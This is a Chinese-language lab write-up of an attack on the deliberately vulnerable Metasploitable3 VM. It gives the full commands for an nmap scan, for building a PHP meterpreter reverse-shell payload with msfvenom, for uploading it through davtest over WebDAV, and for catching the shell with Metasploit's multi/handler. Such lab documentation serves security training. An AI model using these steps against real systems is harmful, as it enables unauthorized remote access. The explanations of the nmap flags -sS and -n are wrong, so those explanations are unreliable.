0%

Metasploitable3漏洞利用实验一则

本文记录利用nmap进行信息收集,msfvenom创建木马文件、结合Metasploit framework的exploit/multi/handler模块实现攻击metasploitable3的实验过程

01 测试环境

1.1 目标机器
Windows server 2008 R2 metasploitable3

目标机器截图1

目标机器截图2

1.2 攻击机

kali 2020.2a

kali 2020.2a

02 信息收集

nmap端口扫描

nmap -p- -sS -sV -v -n –open -oX /home/kali/test/nmap_2k8.xml 192.168.248.103

参数解释:

1
2
3
4
5
6
7
-p- 所有端口
-sS 服务扫描
-sV 版本扫描
-v 详细过程
-n DNS解析
--open 列举开放端口
-oX 输出文件

nmap扫描

03 确定攻击目标

以8585端口上部署的PHP/5.3.10环境的DVA/2作为目标

选择攻击目标

通过浏览器访问目标地址,选择upload位置作为攻击点

选取目标

访问目标

04 执行攻击

4.1 创建木马文件

使用msfvenom创建木马文件,使用php/meterpreter_reverse_tcp作为攻击payload,目标文件为:/home/kali/test/test_0912.php

1
sudo msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.248.102 LPORT=6666 -f raw >/home/kali/test/test_0912.php

创建木马文件

4.2 上传木马文件

使用davtest上传文件,将目标地址作为参数来使用

查看davtest的使用参数,本次仅用到-url(指定攻击路径)、-uploadfile(指定待上传文件)、-uploadloc(指定目标路径)

查看参数

创建目录,检测可以执行的文件路径

可以被上传并执行的文件

上传到指定路径

上传文件

文件成功上传

成功上传

4.3 监听端口,触发木马文件

打开Metasploit Framework,使用exploit/multi/handler模块监听目标端口,等待回连

上传到目标机器上的木马文件中配置的ip地址是kali的本机地址,所以kali机器设置监听本机地址的6666端口即可

等待回连

点击访问上传的木马文件:666666.php

点击访问上传的木马文件

获得shell,攻击成功

获得shell

使用ls查看当前路径下的文件
使用ls查看当前路径下的文件

使用pwd查看当前路径
使用pwd查看当前路径

The end!


秋风木叶
2020-8-26
有您的赞赏,我会更加有动力!